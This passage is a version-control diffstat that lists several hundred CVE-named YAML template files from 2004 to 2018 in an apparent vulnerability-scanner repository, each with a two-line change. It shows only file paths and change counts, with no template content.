http/cves/2004/CVE-2004-0519.yaml | 2 +- http/cves/2004/CVE-2004-1965.yaml | 2 +- http/cves/2005/CVE-2005-2428.yaml | 2 +- http/cves/2005/CVE-2005-3344.yaml | 2 +- http/cves/2005/CVE-2005-3634.yaml | 2 +- http/cves/2005/CVE-2005-4385.yaml | 2 +- http/cves/2006/CVE-2006-1681.yaml | 2 +- http/cves/2006/CVE-2006-2842.yaml | 2 +- http/cves/2007/CVE-2007-0885.yaml | 2 +- http/cves/2007/CVE-2007-4504.yaml | 2 +- http/cves/2007/CVE-2007-4556.yaml | 2 +- http/cves/2007/CVE-2007-5728.yaml | 2 +- http/cves/2008/CVE-2008-1059.yaml | 2 +- http/cves/2008/CVE-2008-1061.yaml | 2 +- http/cves/2008/CVE-2008-1547.yaml | 2 +- http/cves/2008/CVE-2008-2398.yaml | 2 +- http/cves/2008/CVE-2008-2650.yaml | 2 +- http/cves/2008/CVE-2008-4668.yaml | 2 +- http/cves/2008/CVE-2008-4764.yaml | 2 +- http/cves/2008/CVE-2008-5587.yaml | 2 +- http/cves/2008/CVE-2008-6080.yaml | 2 +- http/cves/2008/CVE-2008-6172.yaml | 2 +- http/cves/2008/CVE-2008-6222.yaml | 2 +- http/cves/2008/CVE-2008-6465.yaml | 2 +- http/cves/2008/CVE-2008-6668.yaml | 2 +- http/cves/2008/CVE-2008-6982.yaml | 2 +- http/cves/2008/CVE-2008-7269.yaml | 2 +- http/cves/2009/CVE-2009-0347.yaml | 2 +- http/cves/2009/CVE-2009-0545.yaml | 2 +- http/cves/2009/CVE-2009-0932.yaml | 2 +- http/cves/2009/CVE-2009-1151.yaml | 2 +- http/cves/2009/CVE-2009-1496.yaml | 2 +- http/cves/2009/CVE-2009-1558.yaml | 2 +- http/cves/2009/CVE-2009-1872.yaml | 2 +- http/cves/2009/CVE-2009-2015.yaml | 2 +- http/cves/2009/CVE-2009-2100.yaml | 2 +- http/cves/2009/CVE-2009-3053.yaml | 2 +- http/cves/2009/CVE-2009-3318.yaml | 2 +- http/cves/2009/CVE-2009-4202.yaml | 2 +- http/cves/2009/CVE-2009-4223.yaml | 2 +- http/cves/2009/CVE-2009-4679.yaml | 2 +- http/cves/2009/CVE-2009-5020.yaml | 2 +- http/cves/2009/CVE-2009-5114.yaml | 2 +- http/cves/2010/CVE-2010-0157.yaml | 2 +- http/cves/2010/CVE-2010-0219.yaml | 2 +- http/cves/2010/CVE-2010-0467.yaml | 2 +- http/cves/2010/CVE-2010-0696.yaml | 2 +- http/cves/2010/CVE-2010-0759.yaml | 2 +- http/cves/2010/CVE-2010-0942.yaml | 2 +- http/cves/2010/CVE-2010-0943.yaml | 2 +- http/cves/2010/CVE-2010-0944.yaml | 2 +- http/cves/2010/CVE-2010-0972.yaml | 2 +- http/cves/2010/CVE-2010-0982.yaml | 2 +- http/cves/2010/CVE-2010-0985.yaml | 2 +- http/cves/2010/CVE-2010-1056.yaml | 2 +- http/cves/2010/CVE-2010-1081.yaml | 2 +- http/cves/2010/CVE-2010-1217.yaml | 2 +- http/cves/2010/CVE-2010-1219.yaml | 2 +- http/cves/2010/CVE-2010-1302.yaml | 2 +- http/cves/2010/CVE-2010-1304.yaml | 2 +- http/cves/2010/CVE-2010-1305.yaml | 2 +- http/cves/2010/CVE-2010-1306.yaml | 2 +- http/cves/2010/CVE-2010-1307.yaml | 2 +- http/cves/2010/CVE-2010-1308.yaml | 2 +- http/cves/2010/CVE-2010-1312.yaml | 2 +- http/cves/2010/CVE-2010-1313.yaml | 2 +- http/cves/2010/CVE-2010-1314.yaml | 2 +- http/cves/2010/CVE-2010-1315.yaml | 2 +- http/cves/2010/CVE-2010-1340.yaml | 2 +- http/cves/2010/CVE-2010-1345.yaml | 2 +- http/cves/2010/CVE-2010-1352.yaml | 2 +- http/cves/2010/CVE-2010-1353.yaml | 2 +- http/cves/2010/CVE-2010-1354.yaml | 2 +- http/cves/2010/CVE-2010-1429.yaml | 2 +- http/cves/2010/CVE-2010-1461.yaml | 2 +- http/cves/2010/CVE-2010-1469.yaml | 2 +- http/cves/2010/CVE-2010-1470.yaml | 2 +- http/cves/2010/CVE-2010-1471.yaml | 2 +- http/cves/2010/CVE-2010-1472.yaml | 2 +- http/cves/2010/CVE-2010-1473.yaml | 2 +- http/cves/2010/CVE-2010-1474.yaml | 2 +- http/cves/2010/CVE-2010-1475.yaml | 2 +- http/cves/2010/CVE-2010-1476.yaml | 2 +- http/cves/2010/CVE-2010-1478.yaml | 2 +- http/cves/2010/CVE-2010-1491.yaml | 2 +- http/cves/2010/CVE-2010-1494.yaml | 2 +- http/cves/2010/CVE-2010-1495.yaml | 2 +- http/cves/2010/CVE-2010-1531.yaml | 2 +- http/cves/2010/CVE-2010-1532.yaml | 2 +- http/cves/2010/CVE-2010-1533.yaml | 2 +- http/cves/2010/CVE-2010-1534.yaml | 2 +- http/cves/2010/CVE-2010-1535.yaml | 2 +- http/cves/2010/CVE-2010-1540.yaml | 2 +- http/cves/2010/CVE-2010-1586.yaml | 2 +- http/cves/2010/CVE-2010-1601.yaml | 2 +- http/cves/2010/CVE-2010-1602.yaml | 2 +- http/cves/2010/CVE-2010-1603.yaml | 2 +- http/cves/2010/CVE-2010-1607.yaml | 2 +- http/cves/2010/CVE-2010-1653.yaml | 2 +- http/cves/2010/CVE-2010-1657.yaml | 2 +- http/cves/2010/CVE-2010-1658.yaml | 2 +- http/cves/2010/CVE-2010-1659.yaml | 2 +- http/cves/2010/CVE-2010-1714.yaml | 2 +- http/cves/2010/CVE-2010-1715.yaml | 2 +- http/cves/2010/CVE-2010-1717.yaml | 2 +- http/cves/2010/CVE-2010-1718.yaml | 2 +- http/cves/2010/CVE-2010-1719.yaml | 2 +- http/cves/2010/CVE-2010-1722.yaml | 2 +- http/cves/2010/CVE-2010-1723.yaml | 2 +- http/cves/2010/CVE-2010-1858.yaml | 2 +- http/cves/2010/CVE-2010-1870.yaml | 2 +- http/cves/2010/CVE-2010-1875.yaml | 2 +- http/cves/2010/CVE-2010-1878.yaml | 2 +- http/cves/2010/CVE-2010-1952.yaml | 2 +- http/cves/2010/CVE-2010-1953.yaml | 2 +- http/cves/2010/CVE-2010-1954.yaml | 2 +- http/cves/2010/CVE-2010-1955.yaml | 2 +- http/cves/2010/CVE-2010-1956.yaml | 2 +- http/cves/2010/CVE-2010-1957.yaml | 2 +- http/cves/2010/CVE-2010-1977.yaml | 2 +- http/cves/2010/CVE-2010-1979.yaml | 2 +- http/cves/2010/CVE-2010-1980.yaml | 2 +- http/cves/2010/CVE-2010-1981.yaml | 2 +- http/cves/2010/CVE-2010-1982.yaml | 2 +- http/cves/2010/CVE-2010-1983.yaml | 2 +- http/cves/2010/CVE-2010-2033.yaml | 2 +- http/cves/2010/CVE-2010-2034.yaml | 2 +- http/cves/2010/CVE-2010-2035.yaml | 2 +- http/cves/2010/CVE-2010-2036.yaml | 2 +- http/cves/2010/CVE-2010-2037.yaml | 2 +- http/cves/2010/CVE-2010-2045.yaml | 2 +- http/cves/2010/CVE-2010-2050.yaml | 2 +- http/cves/2010/CVE-2010-2122.yaml | 2 +- http/cves/2010/CVE-2010-2128.yaml | 2 +- http/cves/2010/CVE-2010-2259.yaml | 2 +- http/cves/2010/CVE-2010-2307.yaml | 2 +- http/cves/2010/CVE-2010-2507.yaml | 2 +- http/cves/2010/CVE-2010-2680.yaml | 2 +- http/cves/2010/CVE-2010-2682.yaml | 2 +- http/cves/2010/CVE-2010-2857.yaml | 2 +- http/cves/2010/CVE-2010-2861.yaml | 2 +- http/cves/2010/CVE-2010-2918.yaml | 2 +- http/cves/2010/CVE-2010-2920.yaml | 2 +- http/cves/2010/CVE-2010-3203.yaml | 2 +- http/cves/2010/CVE-2010-3426.yaml | 2 +- http/cves/2010/CVE-2010-4231.yaml | 2 +- http/cves/2010/CVE-2010-4239.yaml | 2 +- http/cves/2010/CVE-2010-4282.yaml | 2 +- http/cves/2010/CVE-2010-4617.yaml | 2 +- http/cves/2010/CVE-2010-4719.yaml | 2 +- http/cves/2010/CVE-2010-4769.yaml | 2 +- http/cves/2010/CVE-2010-4977.yaml | 2 +- http/cves/2010/CVE-2010-5028.yaml | 2 +- http/cves/2010/CVE-2010-5278.yaml | 2 +- http/cves/2010/CVE-2010-5286.yaml | 2 +- http/cves/2011/CVE-2011-0049.yaml | 2 +- http/cves/2011/CVE-2011-1669.yaml | 2 +- http/cves/2011/CVE-2011-2744.yaml | 2 +- http/cves/2011/CVE-2011-2780.yaml | 2 +- http/cves/2011/CVE-2011-3315.yaml | 2 +- http/cves/2011/CVE-2011-4336.yaml | 2 +- http/cves/2011/CVE-2011-4618.yaml | 2 +- http/cves/2011/CVE-2011-4624.yaml | 2 +- http/cves/2011/CVE-2011-4804.yaml | 2 +- http/cves/2011/CVE-2011-4926.yaml | 2 +- http/cves/2011/CVE-2011-5106.yaml | 2 +- http/cves/2011/CVE-2011-5107.yaml | 2 +- http/cves/2011/CVE-2011-5179.yaml | 2 +- http/cves/2011/CVE-2011-5181.yaml | 2 +- http/cves/2011/CVE-2011-5252.yaml | 2 +- http/cves/2011/CVE-2011-5265.yaml | 2 +- http/cves/2012/CVE-2012-0392.yaml | 2 +- http/cves/2012/CVE-2012-0394.yaml | 2 +- http/cves/2012/CVE-2012-0896.yaml | 2 +- http/cves/2012/CVE-2012-0901.yaml | 2 +- http/cves/2012/CVE-2012-0981.yaml | 2 +- http/cves/2012/CVE-2012-0991.yaml | 2 +- http/cves/2012/CVE-2012-0996.yaml | 2 +- http/cves/2012/CVE-2012-1226.yaml | 2 +- http/cves/2012/CVE-2012-1823.yaml | 2 +- http/cves/2012/CVE-2012-1835.yaml | 2 +- http/cves/2012/CVE-2012-2371.yaml | 2 +- http/cves/2012/CVE-2012-3153.yaml | 2 +- http/cves/2012/CVE-2012-4032.yaml | 2 +- http/cves/2012/CVE-2012-4242.yaml | 2 +- http/cves/2012/CVE-2012-4253.yaml | 2 +- http/cves/2012/CVE-2012-4273.yaml | 2 +- http/cves/2012/CVE-2012-4547.yaml | 2 +- http/cves/2012/CVE-2012-4768.yaml | 2 +- http/cves/2012/CVE-2012-4878.yaml | 2 +- http/cves/2012/CVE-2012-4889.yaml | 2 +- http/cves/2012/CVE-2012-4940.yaml | 2 +- http/cves/2012/CVE-2012-4982.yaml | 2 +- http/cves/2012/CVE-2012-5321.yaml | 2 +- http/cves/2012/CVE-2012-5913.yaml | 2 +- http/cves/2012/CVE-2012-6499.yaml | 2 +- http/cves/2013/CVE-2013-1965.yaml | 2 +- http/cves/2013/CVE-2013-2248.yaml | 2 +- http/cves/2013/CVE-2013-2251.yaml | 2 +- http/cves/2013/CVE-2013-2287.yaml | 2 +- http/cves/2013/CVE-2013-2621.yaml | 2 +- http/cves/2013/CVE-2013-3526.yaml | 2 +- http/cves/2013/CVE-2013-3827.yaml | 2 +- http/cves/2013/CVE-2013-4117.yaml | 2 +- http/cves/2013/CVE-2013-4625.yaml | 2 +- http/cves/2013/CVE-2013-5528.yaml | 2 +- http/cves/2013/CVE-2013-5979.yaml | 2 +- http/cves/2013/CVE-2013-6281.yaml | 2 +- http/cves/2013/CVE-2013-7091.yaml | 2 +- http/cves/2013/CVE-2013-7240.yaml | 2 +- http/cves/2013/CVE-2013-7285.yaml | 2 +- http/cves/2014/CVE-2014-10037.yaml | 2 +- http/cves/2014/CVE-2014-1203.yaml | 2 +- http/cves/2014/CVE-2014-2321.yaml | 2 +- http/cves/2014/CVE-2014-2323.yaml | 2 +- http/cves/2014/CVE-2014-2383.yaml | 2 +- http/cves/2014/CVE-2014-2908.yaml | 2 +- http/cves/2014/CVE-2014-2962.yaml | 2 +- http/cves/2014/CVE-2014-3120.yaml | 2 +- http/cves/2014/CVE-2014-3206.yaml | 2 +- http/cves/2014/CVE-2014-3704.yaml | 2 +- http/cves/2014/CVE-2014-3744.yaml | 2 +- http/cves/2014/CVE-2014-4210.yaml | 2 +- http/cves/2014/CVE-2014-4513.yaml | 2 +- http/cves/2014/CVE-2014-4535.yaml | 2 +- http/cves/2014/CVE-2014-4536.yaml | 2 +- http/cves/2014/CVE-2014-4539.yaml | 2 +- http/cves/2014/CVE-2014-4544.yaml | 2 +- http/cves/2014/CVE-2014-4550.yaml | 2 +- http/cves/2014/CVE-2014-4558.yaml | 2 +- http/cves/2014/CVE-2014-4561.yaml | 2 +- http/cves/2014/CVE-2014-4592.yaml | 2 +- http/cves/2014/CVE-2014-4940.yaml | 2 +- http/cves/2014/CVE-2014-4942.yaml | 2 +- http/cves/2014/CVE-2014-5111.yaml | 2 +- http/cves/2014/CVE-2014-5258.yaml | 2 +- http/cves/2014/CVE-2014-5368.yaml | 2 +- http/cves/2014/CVE-2014-6287.yaml | 2 +- http/cves/2014/CVE-2014-6308.yaml | 2 +- http/cves/2014/CVE-2014-8676.yaml | 2 +- http/cves/2014/CVE-2014-8682.yaml | 2 +- http/cves/2014/CVE-2014-8799.yaml | 2 +- http/cves/2014/CVE-2014-9094.yaml | 2 +- http/cves/2014/CVE-2014-9119.yaml | 2 +- http/cves/2014/CVE-2014-9180.yaml | 2 +- http/cves/2014/CVE-2014-9444.yaml | 2 +- http/cves/2014/CVE-2014-9606.yaml | 2 +- http/cves/2014/CVE-2014-9607.yaml | 2 +- http/cves/2014/CVE-2014-9608.yaml | 2 +- http/cves/2014/CVE-2014-9609.yaml | 2 +- http/cves/2014/CVE-2014-9614.yaml | 2 +- http/cves/2014/CVE-2014-9615.yaml | 2 +- http/cves/2014/CVE-2014-9617.yaml | 2 +- http/cves/2014/CVE-2014-9618.yaml | 2 +- http/cves/2015/CVE-2015-0554.yaml | 2 +- http/cves/2015/CVE-2015-1000005.yaml | 2 +- http/cves/2015/CVE-2015-1000010.yaml | 2 +- http/cves/2015/CVE-2015-1000012.yaml | 2 +- http/cves/2015/CVE-2015-1427.yaml | 2 +- http/cves/2015/CVE-2015-1503.yaml | 2 +- http/cves/2015/CVE-2015-1579.yaml | 2 +- http/cves/2015/CVE-2015-1880.yaml | 2 +- http/cves/2015/CVE-2015-2067.yaml | 2 +- http/cves/2015/CVE-2015-2068.yaml | 2 +- http/cves/2015/CVE-2015-2080.yaml | 2 +- http/cves/2015/CVE-2015-2166.yaml | 2 +- http/cves/2015/CVE-2015-2196.yaml | 2 +- http/cves/2015/CVE-2015-2755.yaml | 2 +- http/cves/2015/CVE-2015-2794.yaml | 2 +- http/cves/2015/CVE-2015-2807.yaml | 2 +- http/cves/2015/CVE-2015-2863.yaml | 2 +- http/cves/2015/CVE-2015-2996.yaml | 2 +- http/cves/2015/CVE-2015-3035.yaml | 2 +- http/cves/2015/CVE-2015-3224.yaml | 2 +- http/cves/2015/CVE-2015-3337.yaml | 2 +- http/cves/2015/CVE-2015-3648.yaml | 2 +- http/cves/2015/CVE-2015-3897.yaml | 2 +- http/cves/2015/CVE-2015-4050.yaml | 2 +- http/cves/2015/CVE-2015-4062.yaml | 2 +- http/cves/2015/CVE-2015-4063.yaml | 2 +- http/cves/2015/CVE-2015-4074.yaml | 2 +- http/cves/2015/CVE-2015-4127.yaml | 2 +- http/cves/2015/CVE-2015-4414.yaml | 2 +- http/cves/2015/CVE-2015-4632.yaml | 2 +- http/cves/2015/CVE-2015-4666.yaml | 2 +- http/cves/2015/CVE-2015-4668.yaml | 2 +- http/cves/2015/CVE-2015-4694.yaml | 2 +- http/cves/2015/CVE-2015-5354.yaml | 2 +- http/cves/2015/CVE-2015-5461.yaml | 2 +- http/cves/2015/CVE-2015-5469.yaml | 2 +- http/cves/2015/CVE-2015-5471.yaml | 2 +- http/cves/2015/CVE-2015-5531.yaml | 2 +- http/cves/2015/CVE-2015-5688.yaml | 2 +- http/cves/2015/CVE-2015-6477.yaml | 2 +- http/cves/2015/CVE-2015-6544.yaml | 2 +- http/cves/2015/CVE-2015-6920.yaml | 2 +- http/cves/2015/CVE-2015-7245.yaml | 2 +- http/cves/2015/CVE-2015-7377.yaml | 2 +- http/cves/2015/CVE-2015-7450.yaml | 2 +- http/cves/2015/CVE-2015-7780.yaml | 2 +- http/cves/2015/CVE-2015-7823.yaml | 2 +- http/cves/2015/CVE-2015-8349.yaml | 2 +- http/cves/2015/CVE-2015-8399.yaml | 2 +- http/cves/2015/CVE-2015-8813.yaml | 2 +- http/cves/2015/CVE-2015-9312.yaml | 2 +- http/cves/2015/CVE-2015-9323.yaml | 2 +- http/cves/2015/CVE-2015-9414.yaml | 2 +- http/cves/2015/CVE-2015-9480.yaml | 2 +- http/cves/2016/CVE-2016-0957.yaml | 2 +- http/cves/2016/CVE-2016-1000126.yaml | 2 +- http/cves/2016/CVE-2016-1000127.yaml | 2 +- http/cves/2016/CVE-2016-1000128.yaml | 2 +- http/cves/2016/CVE-2016-1000129.yaml | 2 +- http/cves/2016/CVE-2016-1000130.yaml | 2 +- http/cves/2016/CVE-2016-1000131.yaml | 2 +- http/cves/2016/CVE-2016-1000132.yaml | 2 +- http/cves/2016/CVE-2016-1000133.yaml | 2 +- http/cves/2016/CVE-2016-1000134.yaml | 2 +- http/cves/2016/CVE-2016-1000135.yaml | 2 +- http/cves/2016/CVE-2016-1000136.yaml | 2 +- http/cves/2016/CVE-2016-1000137.yaml | 2 +- http/cves/2016/CVE-2016-1000138.yaml | 2 +- http/cves/2016/CVE-2016-1000139.yaml | 2 +- http/cves/2016/CVE-2016-1000140.yaml | 2 +- http/cves/2016/CVE-2016-1000141.yaml | 2 +- http/cves/2016/CVE-2016-1000142.yaml | 2 +- http/cves/2016/CVE-2016-1000143.yaml | 2 +- http/cves/2016/CVE-2016-1000146.yaml | 2 +- http/cves/2016/CVE-2016-1000148.yaml | 2 +- http/cves/2016/CVE-2016-1000149.yaml | 2 +- http/cves/2016/CVE-2016-1000152.yaml | 2 +- http/cves/2016/CVE-2016-1000153.yaml | 2 +- http/cves/2016/CVE-2016-1000154.yaml | 2 +- http/cves/2016/CVE-2016-1000155.yaml | 2 +- http/cves/2016/CVE-2016-10033.yaml | 2 +- http/cves/2016/CVE-2016-10108.yaml | 2 +- http/cves/2016/CVE-2016-10134.yaml | 2 +- http/cves/2016/CVE-2016-10367.yaml | 2 +- http/cves/2016/CVE-2016-10368.yaml | 2 +- http/cves/2016/CVE-2016-10924.yaml | 2 +- http/cves/2016/CVE-2016-10940.yaml | 2 +- http/cves/2016/CVE-2016-10956.yaml | 2 +- http/cves/2016/CVE-2016-10960.yaml | 2 +- http/cves/2016/CVE-2016-10973.yaml | 2 +- http/cves/2016/CVE-2016-10993.yaml | 2 +- http/cves/2016/CVE-2016-1555.yaml | 2 +- http/cves/2016/CVE-2016-2389.yaml | 2 +- http/cves/2016/CVE-2016-3088.yaml | 2 +- http/cves/2016/CVE-2016-3978.yaml | 2 +- http/cves/2016/CVE-2016-4437.yaml | 2 +- http/cves/2016/CVE-2016-4975.yaml | 2 +- http/cves/2016/CVE-2016-4977.yaml | 2 +- http/cves/2016/CVE-2016-5649.yaml | 2 +- http/cves/2016/CVE-2016-6195.yaml | 2 +- http/cves/2016/CVE-2016-6277.yaml | 2 +- http/cves/2016/CVE-2016-6601.yaml | 2 +- http/cves/2016/CVE-2016-7552.yaml | 2 +- http/cves/2016/CVE-2016-7834.yaml | 2 +- http/cves/2016/CVE-2016-7981.yaml | 2 +- http/cves/2016/CVE-2016-8527.yaml | 2 +- http/cves/2017/CVE-2017-0929.yaml | 2 +- http/cves/2017/CVE-2017-1000028.yaml | 2 +- http/cves/2017/CVE-2017-1000029.yaml | 2 +- http/cves/2017/CVE-2017-1000163.yaml | 2 +- http/cves/2017/CVE-2017-1000170.yaml | 2 +- http/cves/2017/CVE-2017-1000486.yaml | 2 +- http/cves/2017/CVE-2017-10075.yaml | 2 +- http/cves/2017/CVE-2017-10271.yaml | 2 +- http/cves/2017/CVE-2017-10974.yaml | 2 +- http/cves/2017/CVE-2017-11165.yaml | 2 +- http/cves/2017/CVE-2017-11444.yaml | 2 +- http/cves/2017/CVE-2017-11512.yaml | 2 +- http/cves/2017/CVE-2017-11586.yaml | 2 +- http/cves/2017/CVE-2017-11610.yaml | 2 +- http/cves/2017/CVE-2017-11629.yaml | 2 +- http/cves/2017/CVE-2017-12138.yaml | 2 +- http/cves/2017/CVE-2017-12149.yaml | 2 +- http/cves/2017/CVE-2017-12542.yaml | 2 +- http/cves/2017/CVE-2017-12544.yaml | 2 +- http/cves/2017/CVE-2017-12583.yaml | 2 +- http/cves/2017/CVE-2017-12611.yaml | 2 +- http/cves/2017/CVE-2017-12615.yaml | 2 +- http/cves/2017/CVE-2017-12617.yaml | 2 +- http/cves/2017/CVE-2017-12629.yaml | 2 +- http/cves/2017/CVE-2017-12635.yaml | 2 +- http/cves/2017/CVE-2017-12637.yaml | 2 +- http/cves/2017/CVE-2017-12794.yaml | 2 +- http/cves/2017/CVE-2017-14135.yaml | 2 +- http/cves/2017/CVE-2017-14186.yaml | 2 +- http/cves/2017/CVE-2017-14524.yaml | 2 +- http/cves/2017/CVE-2017-14535.yaml | 2 +- http/cves/2017/CVE-2017-14537.yaml | 2 +- http/cves/2017/CVE-2017-14622.yaml | 2 +- http/cves/2017/CVE-2017-14651.yaml | 2 +- http/cves/2017/CVE-2017-14849.yaml | 2 +- http/cves/2017/CVE-2017-15287.yaml | 2 +- http/cves/2017/CVE-2017-15363.yaml | 2 +- http/cves/2017/CVE-2017-15647.yaml | 2 +- http/cves/2017/CVE-2017-15715.yaml | 2 +- http/cves/2017/CVE-2017-15944.yaml | 2 +- http/cves/2017/CVE-2017-16806.yaml | 2 +- http/cves/2017/CVE-2017-16877.yaml | 2 +- http/cves/2017/CVE-2017-16894.yaml | 2 +- http/cves/2017/CVE-2017-17043.yaml | 2 +- http/cves/2017/CVE-2017-17059.yaml | 2 +- http/cves/2017/CVE-2017-17451.yaml | 2 +- http/cves/2017/CVE-2017-17562.yaml | 2 +- http/cves/2017/CVE-2017-17731.yaml | 2 +- http/cves/2017/CVE-2017-17736.yaml | 2 +- http/cves/2017/CVE-2017-18024.yaml | 2 +- http/cves/2017/CVE-2017-18487.yaml | 2 +- http/cves/2017/CVE-2017-18490.yaml | 2 +- http/cves/2017/CVE-2017-18491.yaml | 2 +- http/cves/2017/CVE-2017-18492.yaml | 2 +- http/cves/2017/CVE-2017-18493.yaml | 2 +- http/cves/2017/CVE-2017-18494.yaml | 2 +- http/cves/2017/CVE-2017-18496.yaml | 2 +- http/cves/2017/CVE-2017-18500.yaml | 2 +- http/cves/2017/CVE-2017-18501.yaml | 2 +- http/cves/2017/CVE-2017-18502.yaml | 2 +- http/cves/2017/CVE-2017-18505.yaml | 2 +- http/cves/2017/CVE-2017-18516.yaml | 2 +- http/cves/2017/CVE-2017-18517.yaml | 2 +- http/cves/2017/CVE-2017-18518.yaml | 2 +- http/cves/2017/CVE-2017-18527.yaml | 2 +- http/cves/2017/CVE-2017-18528.yaml | 2 +- http/cves/2017/CVE-2017-18529.yaml | 2 +- http/cves/2017/CVE-2017-18530.yaml | 2 +- http/cves/2017/CVE-2017-18532.yaml | 2 +- http/cves/2017/CVE-2017-18536.yaml | 2 +- http/cves/2017/CVE-2017-18537.yaml | 2 +- http/cves/2017/CVE-2017-18542.yaml | 2 +- http/cves/2017/CVE-2017-18556.yaml | 2 +- http/cves/2017/CVE-2017-18557.yaml | 2 +- http/cves/2017/CVE-2017-18558.yaml | 2 +- http/cves/2017/CVE-2017-18562.yaml | 2 +- http/cves/2017/CVE-2017-18564.yaml | 2 +- http/cves/2017/CVE-2017-18565.yaml | 2 +- http/cves/2017/CVE-2017-18566.yaml | 2 +- http/cves/2017/CVE-2017-18598.yaml | 2 +- http/cves/2017/CVE-2017-18638.yaml | 2 +- http/cves/2017/CVE-2017-3506.yaml | 2 +- http/cves/2017/CVE-2017-3528.yaml | 2 +- http/cves/2017/CVE-2017-4011.yaml | 2 +- http/cves/2017/CVE-2017-5487.yaml | 2 +- http/cves/2017/CVE-2017-5521.yaml | 2 +- http/cves/2017/CVE-2017-5631.yaml | 2 +- http/cves/2017/CVE-2017-5638.yaml | 2 +- http/cves/2017/CVE-2017-5689.yaml | 2 +- http/cves/2017/CVE-2017-5982.yaml | 2 +- http/cves/2017/CVE-2017-6090.yaml | 2 +- http/cves/2017/CVE-2017-7269.yaml | 2 +- http/cves/2017/CVE-2017-7391.yaml | 2 +- http/cves/2017/CVE-2017-7615.yaml | 2 +- http/cves/2017/CVE-2017-7855.yaml | 2 +- http/cves/2017/CVE-2017-7921.yaml | 2 +- http/cves/2017/CVE-2017-7925.yaml | 2 +- http/cves/2017/CVE-2017-8229.yaml | 2 +- http/cves/2017/CVE-2017-8917.yaml | 2 +- http/cves/2017/CVE-2017-9140.yaml | 2 +- http/cves/2017/CVE-2017-9288.yaml | 2 +- http/cves/2017/CVE-2017-9416.yaml | 2 +- http/cves/2017/CVE-2017-9506.yaml | 2 +- http/cves/2017/CVE-2017-9791.yaml | 2 +- http/cves/2017/CVE-2017-9805.yaml | 2 +- http/cves/2017/CVE-2017-9822.yaml | 2 +- http/cves/2017/CVE-2017-9833.yaml | 2 +- http/cves/2017/CVE-2017-9841.yaml | 2 +- http/cves/2018/CVE-2018-0127.yaml | 2 +- http/cves/2018/CVE-2018-0296.yaml | 2 +- http/cves/2018/CVE-2018-1000129.yaml | 2 +- http/cves/2018/CVE-2018-1000130.yaml | 2 +- http/cves/2018/CVE-2018-1000226.yaml | 2 +- http/cves/2018/CVE-2018-1000533.yaml | 2 +- http/cves/2018/CVE-2018-1000600.yaml | 2 +- http/cves/2018/CVE-2018-1000671.yaml | 2 +- http/cves/2018/CVE-2018-1000856.yaml | 2 +- http/cves/2018/CVE-2018-1000861.yaml | 2 +- http/cves/2018/CVE-2018-10093.yaml | 2 +- http/cves/2018/CVE-2018-10095.yaml | 2 +- http/cves/2018/CVE-2018-10141.yaml | 2 +- http/cves/2018/CVE-2018-10201.yaml | 2 +- http/cves/2018/CVE-2018-10230.yaml | 2 +- http/cves/2018/CVE-2018-10562.yaml | 2 +- http/cves/2018/CVE-2018-10822.yaml | 2 +- http/cves/2018/CVE-2018-10823.yaml | 2 +- http/cves/2018/CVE-2018-10956.yaml | 2 +- http/cves/2018/CVE-2018-11227.yaml | 2 +- http/cves/2018/CVE-2018-11231.yaml | 2 +- http/cves/2018/CVE-2018-11409.yaml | 2 +- http/cves/2018/CVE-2018-11473.yaml | 2 +- http/cves/2018/CVE-2018-11709.yaml | 2 +- http/cves/2018/CVE-2018-11759.yaml | 2 +- http/cves/2018/CVE-2018-11776.yaml | 2 +- http/cves/2018/CVE-2018-11784.yaml | 2 +- http/cves/2018/CVE-2018-12031.yaml | 2 +- http/cves/2018/CVE-2018-12054.yaml | 2 +- http/cves/2018/CVE-2018-1207.yaml | 2 +- http/cves/2018/CVE-2018-12095.yaml | 2 +- http/cves/2018/CVE-2018-12296.yaml | 2 +- http/cves/2018/CVE-2018-12300.yaml | 2 +- http/cves/2018/CVE-2018-12613.yaml | 2 +- http/cves/2018/CVE-2018-12634.yaml | 2 +- http/cves/2018/CVE-2018-12675.yaml | 2 +- http/cves/2018/CVE-2018-1271.yaml | 2 +- http/cves/2018/CVE-2018-1273.yaml | 2 +- http/cves/2018/CVE-2018-12909.yaml | 2 +- http/cves/2018/CVE-2018-12998.yaml | 2 +- http/cves/2018/CVE-2018-1335.yaml | 2 +- http/cves/2018/CVE-2018-13379.yaml | 2 +- http/cves/2018/CVE-2018-13380.yaml | 2 +- http/cves/2018/CVE-2018-13980.yaml | 2 +- http/cves/2018/CVE-2018-14013.yaml | 2 +- http/cves/2018/CVE-2018-14064.yaml | 2 +- http/cves/2018/CVE-2018-14474.yaml | 2 +- http/cves/2018/CVE-2018-14574.yaml | 2 +- http/cves/2018/CVE-2018-14728.yaml | 2 +- http/cves/2018/CVE-2018-14912.yaml | 2 +- http/cves/2018/CVE-2018-14916.yaml | 2 +- http/cves/2018/CVE-2018-14918.yaml | 2 +- http/cves/2018/CVE-2018-14931.yaml | 2 +- http/cves/2018/CVE-2018-15138.yaml | 2 +- http/cves/2018/CVE-2018-15517.yaml | 2 +- http/cves/2018/CVE-2018-15535.yaml | 2 +- http/cves/2018/CVE-2018-15745.yaml | 2 +- http/cves/2018/CVE-2018-15917.yaml | 2 +- http/cves/2018/CVE-2018-15961.yaml | 2 +- http/cves/2018/CVE-2018-16059.yaml | 2 +- http/cves/2018/CVE-2018-16133.yaml | 2 +- http/cves/2018/CVE-2018-16139.yaml | 2 +- http/cves/2018/CVE-2018-16159.yaml | 2 +- http/cves/2018/CVE-2018-16167.yaml | 2 +- http/cves/2018/CVE-2018-16283.yaml | 2 +- http/cves/2018/CVE-2018-16288.yaml | 2 +- http/cves/2018/CVE-2018-16299.yaml | 2 +- http/cves/2018/CVE-2018-16668.yaml | 2 +- http/cves/2018/CVE-2018-16670.yaml | 2 +- http/cves/2018/CVE-2018-16671.yaml | 2 +- http/cves/2018/CVE-2018-16716.yaml | 2 +- http/cves/2018/CVE-2018-16761.yaml | 2 +- http/cves/2018/CVE-2018-16763.yaml | 2 +- http/cves/2018/CVE-2018-16836.yaml | 2 +- http/cves/2018/CVE-2018-16979.yaml | 2 +- http/cves/2018/CVE-2018-17153.yaml | 2 +- http/cves/2018/CVE-2018-17246.yaml | 2 +- http/cves/2018/CVE-2018-17254.yaml | 2 +- http/cves/2018/CVE-2018-17422.yaml | 2 +- http/cves/2018/CVE-2018-17431.yaml | 2 +- http/cves/2018/CVE-2018-18069.yaml | 2 +- http/cves/2018/CVE-2018-18264.yaml | 2 +- http/cves/2018/CVE-2018-18323.yaml | 2 +- http/cves/2018/CVE-2018-18570.yaml | 2 +- http/cves/2018/CVE-2018-18608.yaml | 2 +- http/cves/2018/CVE-2018-18775.yaml | 2 +- 